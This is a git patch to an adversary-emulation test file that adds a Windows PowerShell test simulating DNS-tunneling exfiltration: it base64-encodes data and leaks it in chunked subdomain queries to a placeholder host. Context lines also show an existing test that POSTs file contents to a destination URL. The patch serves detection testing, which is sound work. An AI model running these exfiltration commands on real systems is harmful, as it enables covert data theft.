From a5a1cf78fb59736cfd261b098a7efa6373d171ad Mon Sep 17 00:00:00 2001 From: sai prashanth pulisetti <40313110+prashanthpulisetti@users.noreply.github.com> Date: Mon, 29 Jan 2024 21:53:47 +0530 Subject: [PATCH] Update T1041.yaml DNS-Based C2 Data Exfiltration (#2663) * Update T1041.yaml DNS-Based C2 Data Exfiltration Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel. * Update T1041.yaml updated the changes as requested --------- Co-authored-by: Hare Sudhan Co-authored-by: Carrie Roberts --- atomics/T1041/T1041.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) diff --git a/atomics/T1041/T1041.yaml b/atomics/T1041/T1041.yaml index 33c97841d2..3c83a2aeaa 100644 --- a/atomics/T1041/T1041.yaml +++ b/atomics/T1041/T1041.yaml @@ -25,3 +25,39 @@ atomic_tests: $filecontent = Get-Content -Path #{filepath} Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive name: powershell + +- name: Text Based Data Exfiltration using DNS subdomains + auto_generated_guid: c9207f3e-213d-4cc7-ad2a-7697a7237df9 + description: | + Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel. + supported_platforms: + - windows + input_arguments: + dns_server: + description: DNS server IP address or domain name. + type: url + default: dns.example.com + exfiltrated_data: + description: Data to be exfiltrated. + type: string + default: SecretDataToExfiltrate + chunk_size: + description: Size of each DNS query chunk (in characters). + type: integer + default: 63 + executor: + command: | + $dnsServer = "#{dns_server}" + $exfiltratedData = "#{exfiltrated_data}" + $chunkSize = #{chunk_size} + + $encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData) + $encodedData = [Convert]::ToBase64String($encodedData) + $chunks = $encodedData -split "(.{$chunkSize})" + + foreach ($chunk in $chunks) { + $dnsQuery = $chunk + "." + $dnsServer + Resolve-DnsName -Name $dnsQuery + Start-Sleep -Seconds 5 + } + name: powershell